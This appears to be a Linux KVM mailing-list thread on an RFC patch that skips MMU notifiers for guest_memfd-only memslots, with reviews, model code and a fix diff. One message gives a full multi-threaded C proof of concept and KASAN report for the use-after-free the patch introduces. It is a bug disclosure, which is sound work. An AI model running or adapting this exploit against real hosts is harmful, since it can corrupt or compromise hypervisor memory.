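static unsigned long toy_lookup(struct toy_vm *vm)
{
	unsigned long pfn = vm->current_pfn;

	if (vm->races_left > 0) {
		vm->races_left--;
		vm->current_pfn++;
		if (vm->bump_seq)
			vm->invalidate_seq++;
	}
	return pfn;
}

/* Snapshot the count, look up, and retry if the count moved meanwhile. */
static unsigned long toy_refresh(struct toy_vm *vm)
{
	unsigned long seq, pfn;

	do {
		seq = vm->invalidate_seq;
		pfn = toy_lookup(vm);
	} while (seq != vm->invalidate_seq);

	return pfn;
}
```

With `bump_seq` set, the refresh notices the racing invalidation and returns the page's new location; with it clear, the loop exits after one pass holding a stale pfn, which is the failure mode being discussed.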

> > > By unmapping the anonymous memory, the host would trigger MMU notifiers, but
> > > this new check skips the memslot. As a result, kvm->mmu_invalidate_seq
> > > wouldn't increment, and KVM might retain a kernel mapping to a freed physical
> > > page.
> 
> kvm->mmu_invalidate_seq is incremented in kvm_mmu_invalidate_end(), I don't see
> how that is affected by skipping a memslot in handle_hva_range().

handle_hva_range() only invokes on_lock() if a memslot is found.  By skipping the
memslot entirely, kvm_mmu_invalidate_{start,end}() won't be called and so
mmu_invalidate_seq won't be bumped.
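
To make that concrete, here is a minimal userspace sketch of the gating, not
the kernel code.  The model_* names and the skip_gmem_only knob are invented
for illustration, and the begin/end pair is folded into a single on_lock()
stand-in that bumps the sequence count:

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>

/* Hypothetical, simplified stand-ins for the kernel structures. */
struct model_slot {
	unsigned long hva_start;	/* inclusive */
	unsigned long hva_end;		/* exclusive */
	bool gmem_only;
};

struct model_kvm {
	unsigned long mmu_invalidate_seq;
	bool skip_gmem_only;		/* models the RFC's early "continue" */
};

/* Stand-in for the on_lock() callback; here it only bumps the sequence. */
static void model_on_lock(struct model_kvm *kvm)
{
	kvm->mmu_invalidate_seq++;
}

/*
 * Walk the slots that overlap [start, end).  on_lock() runs at most once,
 * and only after a memslot has been found.  Returns true if one was found.
 */
static bool model_handle_hva_range(struct model_kvm *kvm,
				   const struct model_slot *slots, size_t nr,
				   unsigned long start, unsigned long end)
{
	bool found_memslot = false;

	assert(start < end);

	for (size_t i = 0; i < nr; i++) {
		const struct model_slot *slot = &slots[i];

		if (slot->hva_end <= start || slot->hva_start >= end)
			continue;	/* no overlap with the notifier range */
		if (kvm->skip_gmem_only && slot->gmem_only)
			continue;	/* skipped before on_lock() can run */

		if (!found_memslot) {
			found_memslot = true;
			model_on_lock(kvm);
		}
	}
	return found_memslot;
}
```

With skip_gmem_only set and a single gmem-only slot covering the range, the
function returns false and mmu_invalidate_seq is left unchanged.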

> > > Could this allow the guest to read or write arbitrary host physical memory?
> 
> The KVM_MEMSLOT_GMEM_ONLY flag is set if the backing guest_memfd has been
> created with GUEST_MEMFD_FLAG_MMAP. The documentation for the flag says
> that '[..] the fault will always be consumed from guest_memfd, regardless
> of whether it is a shared or private fault'.  As far as I can tell, this
> means that, absent a fallocate(FALLOC_FL_PUNCH_HOLE) call, the page is
> still in the page cache for the guest_memfd file after userspace has
> unmapped it, so the guest will not be accessing a freed page.

KVM_MEMSLOT_GMEM_ONLY is somewhat misleading, it only applies to KVM's MMU.
For other cases where KVM accesses guest memory, KVM still follows the host virtual
address, e.g. so that copy_{to,from}_user() Just Works.  But userspace isn't
strictly *required* to keep the userspace mapping coherent with guest_memfd, nor
is userspace required to make the userspace mapping fully RWX.  And so if
userspace modifies the VMA, KVM needs to react accordingly.

When in-place conversion comes along, KVM will also rely on userspace mappings
being torn down before allowing a SHARED page to become PRIVATE (for all intents
and purposes, we're conceptually treating conversions as free()+re-alloc()).  So
while the page might still be in the page cache, it's effectively been "freed".
So in that case, KVM really does need to ensure it handles mmu_notifier events
correctly to avoid UAF.

* Re: [RFC PATCH] KVM: Ignore MMU notifiers for guest_memfd-only memslots
  2026-06-17 13:07     ` Alexandru Elisei
  2026-06-17 21:21       ` Sean Christopherson
@ 2026-06-17 21:22       ` Sean Christopherson
  1 sibling, 0 replies; 17+ messages in thread
From: Sean Christopherson @ 2026-06-17 21:22 UTC (permalink / raw)
  To: Alexandru Elisei; +Cc: sashiko-reviews, Marc Zyngier, kvm, kvmarm, Oliver Upton

On Wed, Jun 17, 2026, Alexandru Elisei wrote:
> Hi Sean,
> 
> Thanks for the reply. Just to make sure, once the bugs have been ironed out,
> you're ok with this idea?

Yes, I'm more than ok with this idea.  The only reason I didn't push to do this
right away is that I completely missed it :-)

* Re: [RFC PATCH] KVM: Ignore MMU notifiers for guest_memfd-only memslots
  2026-06-17 21:21       ` Sean Christopherson
@ 2026-06-18 10:19         ` Alexandru Elisei
  2026-06-23 23:41         ` Ackerley Tng
  1 sibling, 0 replies; 17+ messages in thread
From: Alexandru Elisei @ 2026-06-18 10:19 UTC (permalink / raw)
  To: Sean Christopherson
  Cc: sashiko-reviews, Marc Zyngier, kvm, kvmarm, Oliver Upton

Hi Sean,

On Wed, Jun 17, 2026 at 02:21:02PM -0700, Sean Christopherson wrote:
> On Wed, Jun 17, 2026, Alexandru Elisei wrote:
> > Hi Sean,
> > 
> > Thanks for the reply. Just to make sure, once the bugs have been ironed out,
> > you're ok with this idea?
> > 
> > On Mon, Jun 15, 2026 at 10:47:14AM -0700, Sean Christopherson wrote:
> > > On Mon, Jun 15, 2026, sashiko-bot@kernel.org wrote:
> > > > > diff --git a/virt/kvm/kvm_main.c b/virt/kvm/kvm_main.c
> > > > > --- a/virt/kvm/kvm_main.c
> > > > > +++ b/virt/kvm/kvm_main.c
> > > > [ ... ]
> > > > > @@ -592,6 +592,10 @@ static __always_inline kvm_mn_ret_t kvm_handle_hva_range(struct kvm *kvm,
> > > > >  			unsigned long hva_start, hva_end;
> > > > >  
> > > > >  			slot = container_of(node, struct kvm_memory_slot, hva_node[slots->node_idx]);
> > > > > +
> > > > > +			if (kvm_slot_has_gmem(slot) && kvm_memslot_is_gmem_only(slot))
> > > > > +				continue;
> > > > > +
> > > > 
> > > > [Severity: Critical]
> > > > Does this change inadvertently introduce a regression in the pfncache retry
> > > > protocol?
> > > > 
> > > > Looking at the pfncache framework, it maps guest memory into kernel space and
> > > > explicitly drops the page reference after mapping it:
> > > > 
> > > > virt/kvm/pfncache.c:hva_to_pfn_retry() {
> > > >     ...
> > > >     kvm_release_page_clean(page);
> > > >     ...
> > > > }
> > > > 
> > > > It appears to rely entirely on KVM's MMU notifiers (kvm->mmu_invalidate_seq)
> > > > to invalidate the cache when the page is unmapped by the host.
> > > > 
> > > > If a VMM defines a guest_memfd-backed memslot with KVM_MEMSLOT_GMEM_ONLY
> > > > but still provides a valid anonymous user mapping as its userspace_addr,
> > > > could this regression lead to a use-after-free?
> > > 
> > > Sadly, yes.  To land this, we would need to first teach the gfn_to_pfn_cache code
> > > to be able to pull directly from guest_memfd.  I forget if anyone is working on
> > > that.
> > 
> > I've been trying to wrap my head around this, and I just can't seem to
> > figure it out.
> > 
> > kvm_mmu_notifier_invalidate_range_start(), before handle_hva_range(), calls
> > gfn_to_pfn_cache_invalidate_start() for the MMU notifier range, and that
> > marks all caches that overlap the range as invalid. kvm_gpc_check() returns
> > false for an invalid cache, so how can the memory still be accessed via the
> > pfncache?
> 
> That just forces gpcs to be refreshed, mmu_notifier_retry_cache() still relies
> on mmu_invalidate_seq being bumped to avoid consuming stale state.

Yes.

> 
> > > > By unmapping the anonymous memory, the host would trigger MMU notifiers, but
> > > > this new check skips the memslot. As a result, kvm->mmu_invalidate_seq
> > > > wouldn't increment, and KVM might retain a kernel mapping to a freed physical
> > > > page.
> > 
> > kvm->mmu_invalidate_seq is incremented in kvm_mmu_invalidate_end(), I don't see
> > how that is affected by skipping a memslot in handle_hva_range().
> 
> handle_hva_range() only invokes on_lock() if a memslot is found.  By skipping the
> memslot entirely, kvm_mmu_invalidate_{start,end}() won't be called and so
> mmu_invalidate_seq won't be bumped.

I see it now, for some reason I completely missed the part where
kvm_mmu_invalidate_{begin,end}() are called via ->on_lock() :( I was under the
impression that they are called directly from the
->invalidate_range_{start,end}() MMU notifier callbacks.

> 
> > > > Could this allow the guest to read or write arbitrary host physical memory?
> > 
> > The KVM_MEMSLOT_GMEM_ONLY flag is set if the backing guest_memfd has been
> > created with GUEST_MEMFD_FLAG_MMAP. The documentation for the flag says
> > that '[..] the fault will always be consumed from guest_memfd, regardless
> > of whether it is a shared or private fault'.  As far as I can tell, this
> > means that, absent a fallocate(FALLOC_FL_PUNCH_HOLE) call, the page is
> > still in the page cache for the guest_memfd file after userspace has
> > unmapped it, so the guest will not be accessing a freed page.
> 
> KVM_MEMSLOT_GMEM_ONLY is somewhat misleading, it only applies to KVM's MMU.
> For other cases where KVM accesses guest memory, KVM still follows the host virtual
> address, e.g. so that copy_{to,from}_user() Just Works.  But userspace isn't
> strictly *required* to keep the userspace mapping coherent with guest_memfd, nor
> is userspace required to make the userspace mapping fully RWX.  And so if
> userspace modifies the VMA, KVM needs to react accordingly.
> 
> When in-place conversion comes along, KVM will also rely on userspace mappings
> being torn down before allowing a SHARED page to become PRIVATE (for all intents
> and purposes, we're conceptually treating conversions as free()+re-alloc()).  So
> while the page might still be in the page cache, it's effectively been "freed".
> So in that case, KVM really does need to ensure it handles mmu_notifier events
> correctly to avoid UAF.

Everything makes more sense now, thanks for your patience in explaining it.

Thanks,
Alex

* Re: [RFC PATCH] KVM: Ignore MMU notifiers for guest_memfd-only memslots
  2026-06-15 18:09     ` Sean Christopherson
@ 2026-06-18 11:09       ` Alexandru Elisei
  0 siblings, 0 replies; 17+ messages in thread
From: Alexandru Elisei @ 2026-06-18 11:09 UTC (permalink / raw)
  To: Sean Christopherson
  Cc: sashiko-reviews, Marc Zyngier, kvm, kvmarm, Oliver Upton

Hi Sean,

On Mon, Jun 15, 2026 at 11:09:21AM -0700, Sean Christopherson wrote:
> On Mon, Jun 15, 2026, Sean Christopherson wrote:
> > On Mon, Jun 15, 2026, sashiko-bot@kernel.org wrote:
> > > > diff --git a/virt/kvm/kvm_main.c b/virt/kvm/kvm_main.c
> > > > --- a/virt/kvm/kvm_main.c
> > > > +++ b/virt/kvm/kvm_main.c
> > > [ ... ]
> > > > @@ -592,6 +592,10 @@ static __always_inline kvm_mn_ret_t kvm_handle_hva_range(struct kvm *kvm,
> > > >  			unsigned long hva_start, hva_end;
> > > >  
> > > >  			slot = container_of(node, struct kvm_memory_slot, hva_node[slots->node_idx]);
> > > > +
> > > > +			if (kvm_slot_has_gmem(slot) && kvm_memslot_is_gmem_only(slot))
> > > > +				continue;
> > > > +
> > > 
> > > [Severity: Critical]
> > > Does this change inadvertently introduce a regression in the pfncache retry
> > > protocol?
> > > 
> > > Looking at the pfncache framework, it maps guest memory into kernel space and
> > > explicitly drops the page reference after mapping it:
> > > 
> > > virt/kvm/pfncache.c:hva_to_pfn_retry() {
> > >     ...
> > >     kvm_release_page_clean(page);
> > >     ...
> > > }
> > > 
> > > It appears to rely entirely on KVM's MMU notifiers (kvm->mmu_invalidate_seq)
> > > to invalidate the cache when the page is unmapped by the host.
> > > 
> > > If a VMM defines a guest_memfd-backed memslot with KVM_MEMSLOT_GMEM_ONLY
> > > but still provides a valid anonymous user mapping as its userspace_addr,
> > > could this regression lead to a use-after-free?
> > 
> > Sadly, yes.  To land this, we would need to first teach the gfn_to_pfn_cache code
> > to be able to pull directly from guest_memfd.  I forget if anyone is working on
> > that.
> 
> Actually, we just need to ensure the invalidation tracking is updated, the MMU
> itself can be left as-is.
> 
> Compile tested only, but this?
> 
> diff --git a/include/linux/kvm_host.h b/include/linux/kvm_host.h
> index 27498e990dff..690ab707816b 100644
> --- a/include/linux/kvm_host.h
> +++ b/include/linux/kvm_host.h
> @@ -260,6 +260,7 @@ union kvm_mmu_notifier_arg {
>  enum kvm_gfn_range_filter {
>         KVM_FILTER_SHARED               = BIT(0),
>         KVM_FILTER_PRIVATE              = BIT(1),
> +       KVM_FILTER_USERSPACE_MAPPINGS   = BIT(2),
>  };
>  
>  struct kvm_gfn_range {
> diff --git a/virt/kvm/kvm_main.c b/virt/kvm/kvm_main.c
> index e44c20c04961..84b693de7e35 100644
> --- a/virt/kvm/kvm_main.c
> +++ b/virt/kvm/kvm_main.c
> @@ -608,7 +608,8 @@ static __always_inline kvm_mn_ret_t kvm_handle_hva_range(struct kvm *kvm,
>                          * HVA-based notifications aren't relevant to private
>                          * mappings as they don't have a userspace mapping.
>                          */
> -                       gfn_range.attr_filter = KVM_FILTER_SHARED;
> +                       gfn_range.attr_filter = KVM_FILTER_SHARED |
> +                                               KVM_FILTER_USERSPACE_MAPPINGS;
>  
>                         /*
>                          * {gfn(page) | page intersects with [hva_start, hva_end)} =
> @@ -715,6 +716,21 @@ void kvm_mmu_invalidate_range_add(struct kvm *kvm, gfn_t start, gfn_t end)
>  bool kvm_mmu_unmap_gfn_range(struct kvm *kvm, struct kvm_gfn_range *range)
>  {
>         kvm_mmu_invalidate_range_add(kvm, range->start, range->end);
> +
> +       /*
> +        * When reacting to changes in userspace mappings, don't unmap memslots
> +        * that are guest_memfd-only, in which case KVM's MMU mappings are
> +        * pulled directly from guest_memfd, i.e. don't depend on the userspace
> +        * mappings.
> +        *
> +        * TODO: Skip gmem-only memslots on mmu_notifier events entirely, once
> +        * gfn_to_pfn_cache is also wired up to directly pull from guest_memfd.
> +        */
> +       if (range->attr_filter & KVM_FILTER_USERSPACE_MAPPINGS &&
> +           kvm_slot_has_gmem(range->slot) &&
> +           kvm_memslot_is_gmem_only(range->slot))
> +               return false;
> +
>         return kvm_unmap_gfn_range(kvm, range);
>  }

Looks correct to me, this way we also make sure we don't hit the
WARN_ON_ONCE() from mmu_invalidate_retry_pfn().
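
As a rough userspace model of the idea in the diff above (not the kernel
implementation): invalidation tracking is always updated, and only the unmap
is skipped when the event comes from a userspace mapping change on a
gmem-only slot.  The model_* names, the counters and the return convention
are made up for illustration:

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>

/* Hypothetical mirror of the filter bits used in the diff. */
enum model_filter {
	MODEL_FILTER_SHARED             = 1 << 0,
	MODEL_FILTER_PRIVATE            = 1 << 1,
	MODEL_FILTER_USERSPACE_MAPPINGS = 1 << 2,
};

struct model_range {
	unsigned int attr_filter;
	bool slot_gmem_only;
};

struct model_state {
	unsigned int ranges_tracked;	/* invalidation tracking updates */
	unsigned int unmaps;		/* secondary MMU unmaps performed */
};

/* Returns true if the secondary MMU mappings were (notionally) zapped. */
static bool model_unmap_gfn_range(struct model_state *st,
				  const struct model_range *range)
{
	assert(st != NULL && range != NULL);

	/* Always record the range, so that retry checks see the event. */
	st->ranges_tracked++;

	/* Userspace mapping changes don't affect gmem-only MMU mappings. */
	if ((range->attr_filter & MODEL_FILTER_USERSPACE_MAPPINGS) &&
	    range->slot_gmem_only)
		return false;

	st->unmaps++;
	return true;
}
```

An HVA-based event on a gmem-only slot bumps ranges_tracked but not unmaps;
the same slot invalidated without MODEL_FILTER_USERSPACE_MAPPINGS is still
unmapped.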

How about the ->{clear_flush,clear,test}_young() MMU notifier callbacks?
Shouldn't they receive the same treatment?

Thanks,
Alex

* Re: [RFC PATCH] KVM: Ignore MMU notifiers for guest_memfd-only memslots
  2026-06-15 17:47   ` Sean Christopherson
  2026-06-15 18:09     ` Sean Christopherson
  2026-06-17 13:07     ` Alexandru Elisei
@ 2026-06-18 11:26     ` David Hildenbrand (Arm)
  2 siblings, 0 replies; 17+ messages in thread
From: David Hildenbrand (Arm) @ 2026-06-18 11:26 UTC (permalink / raw)
  To: Sean Christopherson, sashiko-reviews
  Cc: Alexandru Elisei, Marc Zyngier, kvm, kvmarm, Oliver Upton

On 6/15/26 19:47, Sean Christopherson wrote:
> On Mon, Jun 15, 2026, sashiko-bot@kernel.org wrote:
>>> diff --git a/virt/kvm/kvm_main.c b/virt/kvm/kvm_main.c
>>> --- a/virt/kvm/kvm_main.c
>>> +++ b/virt/kvm/kvm_main.c
>> [ ... ]
>>> @@ -592,6 +592,10 @@ static __always_inline kvm_mn_ret_t kvm_handle_hva_range(struct kvm *kvm,
>>>  			unsigned long hva_start, hva_end;
>>>  
>>>  			slot = container_of(node, struct kvm_memory_slot, hva_node[slots->node_idx]);
>>> +
>>> +			if (kvm_slot_has_gmem(slot) && kvm_memslot_is_gmem_only(slot))
>>> +				continue;
>>> +
>>
>> [Severity: Critical]
>> Does this change inadvertently introduce a regression in the pfncache retry
>> protocol?
>>
>> Looking at the pfncache framework, it maps guest memory into kernel space and
>> explicitly drops the page reference after mapping it:
>>
>> virt/kvm/pfncache.c:hva_to_pfn_retry() {
>>     ...
>>     kvm_release_page_clean(page);
>>     ...
>> }
>>
>> It appears to rely entirely on KVM's MMU notifiers (kvm->mmu_invalidate_seq)
>> to invalidate the cache when the page is unmapped by the host.
>>
>> If a VMM defines a guest_memfd-backed memslot with KVM_MEMSLOT_GMEM_ONLY
>> but still provides a valid anonymous user mapping as its userspace_addr,
>> could this regression lead to a use-after-free?
> 
> Sadly, yes.  To land this, we would need to first teach the gfn_to_pfn_cache code
> to be able to pull directly from guest_memfd.  I forget if anyone is working on
> that.

For completeness, I think this is what you are looking for:

https://lore.kernel.org/r/20260420154720.29012-1-itazur@amazon.com

-- 
Cheers,

David

* Re: [RFC PATCH] KVM: Ignore MMU notifiers for guest_memfd-only memslots
  2026-06-15 15:52 [RFC PATCH] KVM: Ignore MMU notifiers for guest_memfd-only memslots Alexandru Elisei
  2026-06-15 16:09 ` sashiko-bot
  2026-06-15 19:07 ` David Hildenbrand
@ 2026-06-21  0:02 ` XIAO WU
  2 siblings, 0 replies; 17+ messages in thread
From: XIAO WU @ 2026-06-21  0:02 UTC (permalink / raw)
  To: Alexandru Elisei, pbonzini, kvm, linux-kernel, maz, oupton,
	suzuki.poulose, kvmarm, linux-arm-kernel, seanjc,
	david.hildenbrand, mark.rutland

Hi

I came across the Sashiko review in this thread and wanted to see if
the pfncache UAF could be triggered in practice.  The short answer is:
yes, it reproduces reliably with a multi-threaded PoC.  Below is the
KASAN report and a brief description of the reproducer.

On Mon, Jun 15, 2026 at 04:52:44PM +0100, Alexandru Elisei wrote:
 > For guest_memfd-only memslots (kvm_memslot_is_gmem_only() is true), the
 > memory provider for the virtual machine is the guest_memfd file, not the
 > userspace mapping.
...
 > @@ -592,6 +592,10 @@ static __always_inline kvm_mn_ret_t kvm_handle_hva_range(struct kvm *kvm,
 >              unsigned long hva_start, hva_end;
 >
 >              slot = container_of(node, struct kvm_memory_slot, hva_node[slots->node_idx]);
 > +
 > +            if (kvm_slot_has_gmem(slot) && kvm_memslot_is_gmem_only(slot))
 > +                continue;
 > +

This `continue` is the problem.  When the only memslot covering the
HVA range is gmem-only, found_memslot stays false, and in
invalidate_range_end, kvm_mmu_invalidate_end() is never called.
That means mmu_invalidate_seq never increments.

Meanwhile, the pfncache (used for guest pvclock) runs this retry
protocol in hva_to_pfn_retry():

     1. Capture mmu_seq
     2. Drop gpc->lock
     3. GUP + kmap (gets a page reference, creates kernel mapping)
     4. kvm_release_page_clean(page) — drops the reference
     5. Re-acquire gpc->lock
     6. mmu_notifier_retry_cache() — checks if mmu_seq changed

If step 6 sees the same seq, the stale kmap is kept even though the
page was freed after step 4.  This is the UAF.
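
The six steps can be modelled single-threaded in userspace.  This is only a
sketch under simplifying assumptions: the gpc_model names are invented, the
"page" is just an integer, and the racing invalidation is a callback invoked
at the point where gpc->lock would be dropped:

```c
#include <assert.h>
#include <stddef.h>

/* Hypothetical model state; not the kernel's data structures. */
struct gpc_model {
	unsigned long mmu_invalidate_seq;
	int current_pfn;	/* page currently backing the HVA */
};

/* Simulates an invalidation that races with the refresh. */
typedef void (*gpc_race_fn)(struct gpc_model *m);

/*
 * Model of the retry loop.  Stores the pfn that ends up cached and returns
 * the number of attempts needed.
 */
static int gpc_model_refresh(struct gpc_model *m, gpc_race_fn race,
			     int *cached_pfn)
{
	int attempts = 0;

	assert(cached_pfn != NULL);

	for (;;) {
		unsigned long mmu_seq = m->mmu_invalidate_seq;	/* step 1 */
		int pfn = m->current_pfn;			/* steps 2-4 */

		attempts++;
		if (race && attempts == 1)
			race(m);	/* page replaced while unlocked */

		/* Steps 5-6: keep the mapping only if seq is unchanged. */
		if (m->mmu_invalidate_seq == mmu_seq) {
			*cached_pfn = pfn;
			return attempts;
		}
	}
}

/* Invalidation that is tracked: the page changes and seq is bumped. */
static void gpc_race_with_seq_bump(struct gpc_model *m)
{
	m->current_pfn++;
	m->mmu_invalidate_seq++;
}

/* Invalidation that is skipped: the page changes but seq does not. */
static void gpc_race_without_seq_bump(struct gpc_model *m)
{
	m->current_pfn++;
}
```

With gpc_race_with_seq_bump() the loop retries and caches the new page.  With
gpc_race_without_seq_bump() it returns on the first attempt with the old pfn
cached, which is the stale mapping described above.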

[Reproduction]

I rebuilt the kernel with CONFIG_KASAN=y and ran the PoC in a QEMU VM.
The trigger is three threads racing concurrently:

   - Thread 1 (T0): hammers KVM_RUN ioctls, forcing
     kvm_guest_time_update → kvm_gpc_refresh → hva_to_pfn_retry
   - Thread 2 (T1): cycles KVM_SET_MSRS to activate/deactivate the
     pvclock pfncache, extending the race window
   - Thread 3 (T2): hammers MADV_DONTNEED + write on the HVA, firing
     MMU notifier invalidations while the memslot is gmem-only

The full PoC source (poc.c) is attached at the end of this mail.
Compiled with: gcc -o poc poc.c -static -lpthread

[KASAN report — kernel 7.1.0-g0eb81d7f81ae #1, CONFIG_KASAN=y]

   ==================================================================
   BUG: KASAN: use-after-free in kvm_setup_guest_pvclock+0x632/0x680
   Read of size 4 at addr ffff888116069000 by task poc/9520

   CPU: 1 UID: 0 PID: 9520 Comm: poc Not tainted 7.1.0-g0eb81d7f81ae #1

   Call Trace:
    <TASK>
    dump_stack_lvl+0x116/0x1f0
    print_report+0xf4/0x600
    kasan_report+0xe0/0x110
    kvm_setup_guest_pvclock+0x632/0x680
    kvm_guest_time_update+0x741/0x1090
    vcpu_run+0x1c2a/0x5a80
    kvm_arch_vcpu_ioctl_run+0x1029/0x18d0
    kvm_vcpu_ioctl+0x772/0x1710
    __x64_sys_ioctl+0x193/0x210           ← KVM_RUN
    do_syscall_64+0x129/0x880
    entry_SYSCALL_64_after_hwframe+0x77/0x7f

   The buggy address belongs to the physical page:
   page: refcount:0 mapcount:0 mapping:0000000000000000 index:0x7ff24ab46

   page last allocated via:
    get_user_pages_unlocked → hva_to_pfn → __kvm_gpc_refresh
      → kvm_gpc_refresh → kvm_setup_guest_pvclock

   page last free pid 9520 tgid 9517 stack trace:
    kvm_release_page_clean → __folio_put → __free_frozen_pages
      ← __kvm_gpc_refresh ← kvm_gpc_refresh

The allocation and free traces confirm the exact scenario from the
review: the page is allocated by GUP during gpc refresh, then freed by
kvm_release_page_clean() inside the same __kvm_gpc_refresh() call,
and then kvm_setup_guest_pvclock still accesses it through the stale
kmap.

The crash reproduces within ~40 seconds of the PoC running.

[Full PoC source]

Compile: gcc -o poc poc.c -static -lpthread

// SPDX-License-Identifier: GPL-2.0-only
/*
  * PoC for: KVM MMU notifier skip regression for guest_memfd-only memslots
  *
  * Concurrent threads create a race between gpc refresh (GUP → kmap →
  * kvm_release_page_clean → retry check) and MMU invalidation (munmap /
  * MADV_DONTNEED) on a gmem-only memslot where the invalidation doesn't
  * increment mmu_invalidate_seq.
  */
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <errno.h>
#include <signal.h>
#include <stdbool.h>
#include <stdint.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <pthread.h>
#include <linux/kvm.h>

#ifndef KVM_CAP_GUEST_MEMFD
#define KVM_CAP_GUEST_MEMFD 234
#endif
#ifndef GUEST_MEMFD_FLAG_MMAP
#define GUEST_MEMFD_FLAG_MMAP (1ULL << 0)
#endif
#ifndef MSR_KVM_SYSTEM_TIME_NEW
#define MSR_KVM_SYSTEM_TIME_NEW 0x4b564d01
#endif

#define PAGE_SIZE 4096

static volatile bool stop = false;
static int vcpu_fd = -1;
static unsigned long shared_hva = 0;

static void sigint_handler(int sig) { stop = true; }

static void *worker_thread(void *arg)
{
     int tid = (int)(long)arg;
     for (int i = 0; !stop && i < 200000; i++) {
         if (tid == 0)
             ioctl(vcpu_fd, KVM_RUN, 0);
         else if (tid == 1) {
             struct kvm_msrs *msrs = malloc(sizeof(*msrs) + sizeof(msrs->entries[0]));
             if (msrs) {
                 memset(msrs, 0, sizeof(*msrs) + sizeof(msrs->entries[0]));
                 msrs->nmsrs = 1;
                 msrs->entries[0].index = MSR_KVM_SYSTEM_TIME_NEW;
                 msrs->entries[0].data = (i & 1) ? 0x1001 : 0x1000;
                 ioctl(vcpu_fd, KVM_SET_MSRS, msrs);
                 free(msrs);
             }
         } else {
             madvise((void*)shared_hva, PAGE_SIZE, MADV_DONTNEED);
             *(volatile char*)shared_hva = 0x42;
         }
         if (i % 50000 == 0)
             printf("[T%d] %d iterations\n", tid, i);
     }
     printf("[T%d] Done\n", tid);
     return NULL;
}

int main(void)
{
     signal(SIGINT, sigint_handler);
     signal(SIGTERM, sigint_handler);

     int kvm_fd = open("/dev/kvm", O_RDWR);
     int vm_fd = ioctl(kvm_fd, KVM_CREATE_VM, 0);

     struct kvm_create_guest_memfd gmem_cmd = { .size = PAGE_SIZE, .flags = GUEST_MEMFD_FLAG_MMAP };
     int gmem_fd = ioctl(vm_fd, KVM_CREATE_GUEST_MEMFD, &gmem_cmd);

     void *anon = mmap(NULL, PAGE_SIZE, PROT_READ|PROT_WRITE,
                       MAP_PRIVATE|MAP_ANONYMOUS|MAP_POPULATE, -1, 0);
     memset(anon, 0xAA, PAGE_SIZE);
     shared_hva = (unsigned long)anon;

     struct kvm_userspace_memory_region2 mem = {
         .slot = 0, .flags = KVM_MEM_GUEST_MEMFD,
         .guest_phys_addr = 0x1000, .memory_size = PAGE_SIZE,
         .userspace_addr = shared_hva,
         .guest_memfd_offset = 0, .guest_memfd = gmem_fd,
     };
     ioctl(vm_fd, KVM_SET_USER_MEMORY_REGION2, &mem);

     vcpu_fd = ioctl(vm_fd, KVM_CREATE_VCPU, 0);
     size_t mmap_size = ioctl(kvm_fd, KVM_GET_VCPU_MMAP_SIZE, 0);
     struct kvm_run *vcpu_run = mmap(NULL, mmap_size, PROT_READ|PROT_WRITE,
                                     MAP_SHARED, vcpu_fd, 0);

     /* Pre-activate pfncache via MSR */
     struct kvm_msrs *msrs = malloc(sizeof(*msrs) + sizeof(msrs->entries[0]));
     memset(msrs, 0, sizeof(*msrs) + sizeof(msrs->entries[0]));
     msrs->nmsrs = 1;
     msrs->entries[0].index = MSR_KVM_SYSTEM_TIME_NEW;
     msrs->entries[0].data = 0x1001;
     ioctl(vcpu_fd, KVM_SET_MSRS, msrs);
     free(msrs);

     pthread_t threads[3];
     for (int i = 0; i < 3; i++)
         pthread_create(&threads[i], NULL, worker_thread, (void *)(long)i);

     sleep(40);
     stop = true;
     for (int i = 0; i < 3; i++)
         pthread_join(threads[i], NULL);

     printf("[*] Done. Check dmesg for KASAN UAF.\n");
     return 0;
}

Thanks,
XIAOWU



* Re: [RFC PATCH] KVM: Ignore MMU notifiers for guest_memfd-only memslots
  2026-06-17 21:21       ` Sean Christopherson
  2026-06-18 10:19         ` Alexandru Elisei
@ 2026-06-23 23:41         ` Ackerley Tng
  2026-06-24 17:32           ` Sean Christopherson
  1 sibling, 1 reply; 17+ messages in thread
From: Ackerley Tng @ 2026-06-23 23:41 UTC (permalink / raw)
  To: Sean Christopherson, Alexandru Elisei
  Cc: sashiko-reviews, Marc Zyngier, kvm, kvmarm, Oliver Upton

Sean Christopherson <seanjc@google.com> writes:

>
> [...snip...]
>
>>
>> The KVM_MEMSLOT_GMEM_ONLY flag is set if the backing guest_memfd has been
>> created with GUEST_MEMFD_FLAG_MMAP. The documentation for the flag says
>> that '[..] the fault will always be consumed from guest_memfd, regardless
>> of whether it is a shared or private fault'.  As far as I can tell, this
>> means that, absent a fallocate(FALLOC_FL_PUNCH_HOLE) call, the page is
>> still in the page cache for the guest_memfd file after userspace has
>> unmapped it, so the guest will not be accessing a freed page.
>
> KVM_MEMSLOT_GMEM_ONLY is somewhat misleading, it only applies to KVM's MMU.
> For other cases where KVM accesses guest memory, KVM still follows the host virtual
> address, e.g. so that copy_{to,from}_user() Just Works.  But userspace isn't
> strictly *required* to keep the userspace mapping coherent with guest_memfd, nor
> is userspace required to make the userspace mapping fully RWX.  And so if
> userspace modifies the VMA, KVM needs to react accordingly.
>
> When in-place conversion comes along, KVM will also rely on userspace mappings
> being torn down before allowing a SHARED page to become PRIVATE (for all intents

Conversions explicitly unmap the pages being converted from userspace
page tables, then check for users other than guest_memfd. Unmapping
does invoke the MMU notifier stuff, but conversions don't rely on MMU
notifiers to unmap from stage 2 page tables, since conversions directly
call kvm_gmem_invalidate_start().

On a shared to private conversion, if the page was mapped in stage 2
page tables, we'd have tried to unmap it twice (the second time doesn't
actually unmap, but still tells guest vCPUs trying to fault to retry).

So we're good! With this, the first unmap will notify through MMU
notifiers but actually do no unmapping. Thank you for working on this!

> and purposes, we're conceptually treating conversions as free()+re-alloc()).  So
> while the page might still be in the page cache, it's effectively been "freed".
> So in that case, KVM really does need to ensure it handles mmu_notifier events
> correctly to avoid UAF.

Just making sure: "handle mmu_notifier events" here refers to
gfn_to_pfn_cache and other parts of KVM that work with memory. There's
no issue with a UAF between mmu_notifier invalidations and conversions,
right?

* Re: [RFC PATCH] KVM: Ignore MMU notifiers for guest_memfd-only memslots
  2026-06-23 23:41         ` Ackerley Tng
@ 2026-06-24 17:32           ` Sean Christopherson
  0 siblings, 0 replies; 17+ messages in thread
From: Sean Christopherson @ 2026-06-24 17:32 UTC (permalink / raw)
  To: Ackerley Tng
